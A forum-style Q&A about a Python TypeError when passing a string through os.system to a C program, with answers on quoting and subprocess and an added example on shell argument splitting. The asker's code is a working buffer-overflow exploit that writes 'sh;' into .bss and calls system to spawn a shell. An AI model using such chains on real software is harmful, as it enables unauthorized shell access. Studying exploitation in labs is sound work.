
I am trying to execute a C program with an input string argument from a Python script, but I am getting a type error.

p -> is a string variable
vuln -> is a C binary that I can execute fine using the terminal

This is the line that is giving the error:

system("/tmp/vuln\""+p+"\"")

TypeError: system() argument 1 must be string without null bytes, not str

Thanks

Update: This is the complete code:

#!/usr/bin/python

from struct import pack
from os import system

junk = 'A'*1036 #junk to offset to stored ret
strcpy = pack("<L", 0x0016bf60) #system - 0x10
ppr = pack("<L", 0x080483c2) #pop pop ret

p = junk
p += strcpy
p += ppr
p += pack("<L", 0x0804969c) #bss
p += pack("<L", 0x08048142) # 's'
p += strcpy
p += ppr
p += pack("<L", 0x0804969d) #bss+1
p += pack("<L", 0x080482fa) # 'h'
p += strcpy
p += ppr
p += pack("<L", 0x0804969f) #bss+2
p += pack("<L", 0x080484ff) # ';'
p += pack("<L", 0x0016bf70) #system
p += "AAAA"
p += pack("<L", 0x0804969c) #bss (now contains "sh;<junk>")

system("/tmp/vuln " + p)
    
Use Python's other quoting character ' and you need a space after vuln. Using format is cleaner: system('/tmp/vuln "{}"'.format(p)) – achampion yesterday

2 Answers

You don't need the escaped double-quotes.

system("/tmp/vuln " + p) # note the space before the ending quote

should work fine.

Please note that if you'd like to read output from vuln, or interact with it in any way, you'd be much better off using the subprocess module.


Your input string is all messed up

system("/tmp/vuln " + p)

The extra backspaces are escape characters, and you do not want those here

    
He may need p quoted in order for it to be treated as a single argument to vuln, but you can always use ': '/tmp/vuln "{}"'.format(p) – achampion yesterday
    
If P is a string, there is no reason for him to do any formatting. – AndrewGrant yesterday
    
The underlying shell may need the quotes, e.g. to create a file called "hello world" would need touch "hello world", so this would mean you need the quotes to system, e.g. p = "hello world"; system('touch "{}"'.format(p)) – achampion yesterday
    
The argument inside system() will be created by concatenating the two strings before the function system is called. – AndrewGrant yesterday
    
Try it... system('touch hello world') touches two files, one called hello, the other called world; however, system('touch "hello world"') touches a single file called hello world. – achampion yesterday
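Added example (not code from the question, the answers or the comments): a Python 3 sketch of the two points this thread turns on, namely how a shell splits or rewrites an argument compared with passing an argument list through the subprocess module, and how to find the NUL bytes that the error message in the question complains about. The helper names and all sample values are constructed for illustration.

```python
import ast
import shlex
import subprocess
import sys
from struct import pack

# Child process that prints the argument list it actually received.
REPORT = [sys.executable, "-c", "import sys; print(sys.argv[1:])"]

def nul_offsets(data: bytes) -> list:
    """Offsets of NUL bytes. argv entries are C strings, so any hit means
    the value cannot be passed as a command-line argument at all."""
    return [i for i, b in enumerate(data) if b == 0]

def seen_via_shell(tail: str) -> list:
    """Arguments the child sees when the command line goes through
    /bin/sh, which is what os.system() does."""
    line = " ".join(shlex.quote(part) for part in REPORT) + " " + tail
    out = subprocess.run(line, shell=True, capture_output=True,
                         text=True, check=True)
    return ast.literal_eval(out.stdout.strip())

def seen_via_list(*args: str) -> list:
    """Arguments the child sees when an argument list is passed and no
    shell is involved, so no quoting is needed."""
    out = subprocess.run(REPORT + list(args), capture_output=True,
                         text=True, check=True)
    return ast.literal_eval(out.stdout.strip())

if __name__ == "__main__":
    p = "hello world"                        # constructed sample argument
    print(seen_via_shell(p))                 # split into two arguments
    print(seen_via_shell('"{}"'.format(p)))  # hand-quoted: one argument
    q = 'say "hi" now'                       # constructed: contains quotes
    print(seen_via_shell('"{}"'.format(q)))  # hand-quoting changes the value
    print(seen_via_shell(shlex.quote(q)))    # shlex.quote preserves it
    print(seen_via_list(q))                  # list form preserves it too
    packed = b"A" * 4 + pack("<L", 0x00001234)  # constructed 32-bit value
    print(nul_offsets(packed))               # high bytes are zero
```

Wrapping a value in double quotes by hand only works while the value contains no quote or other shell metacharacters; shlex.quote or the list form of subprocess avoids that dependency.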
